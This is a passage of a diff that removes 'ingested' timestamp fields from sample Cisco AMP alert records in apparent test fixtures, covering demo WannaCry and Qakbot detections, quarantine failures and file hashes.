@@ -4850,7 +4791,6 @@ ], "code": "2164260880", "id": "6419281601187807000", - "ingested": "2022-02-02T05:52:43.212773143Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -4928,7 +4868,6 @@ ], "code": "1090519054", "id": "6419281601187807000", - "ingested": "2022-02-02T05:52:43.212773954Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 
@@ -5027,7 +4966,6 @@ ], "code": "1090519054", "id": "6419281588302905000", - "ingested": "2022-02-02T05:52:43.212774762Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 
@@ -5124,7 +5062,6 @@ ], "code": "553648143", "id": "6419281588302905000", - "ingested": "2022-02-02T05:52:43.212775578Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":927000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -5200,7 +5137,6 @@ ], "code": "2164260893", "id": "6411538569722069000", - "ingested": "2022-02-02T05:52:43.212776545Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "severity": 3 
@@ -5276,7 +5212,6 @@ ], "code": "2164260893", "id": "6411538569722069000", - "ingested": "2022-02-02T05:52:43.212777392Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "severity": 3 
@@ -5348,7 +5283,6 @@ ], "code": "553648155", "id": "6411538569722069000", - "ingested": "2022-02-02T05:52:43.212778201Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "severity": 3 
@@ -5422,7 +5356,6 @@ ], "code": "553648147", "id": "6411538569722069000", - "ingested": "2022-02-02T05:52:43.212779221Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"igvj$vN.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\igvj$vN.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "severity": 3 
@@ -5502,7 +5435,6 @@ ], "code": "553648147", "id": "6411538569722069000", - "ingested": "2022-02-02T05:52:43.212780078Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"6951045.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\6951045.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "severity": 3 
@@ -5582,7 +5514,6 @@ ], "code": "553648147", "id": "6411538569722069000", - "ingested": "2022-02-02T05:52:43.212780946Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"99fffe78e0cbd7b508eed13a8633903dd89ed5f1\",\"md5\":\"dc41e47ebba549ec5e616ed9e88a0376\"}}}}", "severity": 3 
@@ -5668,7 +5599,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212781911Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -5744,7 +5674,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212782728Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -5820,7 +5749,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212783533Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -5896,7 +5824,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212784368Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -5972,7 +5899,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212785174Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -6048,7 +5974,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212786087Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -6124,7 +6049,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212786894Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -6200,7 +6124,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212787690Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 